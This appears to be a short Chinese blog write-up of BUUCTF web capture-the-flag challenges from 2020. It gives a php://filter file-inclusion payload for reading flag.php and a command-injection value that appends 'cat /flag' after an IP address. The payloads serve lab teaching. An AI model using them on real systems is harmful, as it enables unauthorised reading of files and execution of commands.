BUUCTF-Web-2020

本文记录BUUCTF上Web部分2020年的题目。其他BUUCTF的题目参见文末的链接。

$[timeformat('2020-11-03T11:55:44+08:00')]
#CTF #Web

[ACTF2020 新生赛]Include

点击tips跳转至?file=flag.php，直接使用伪协议读文件即可。

?file=php://filter/read=convert.base64-encode/resource=flag.php

直接使用分号拼下一条命令。

target=127.0.0.1;cat /flag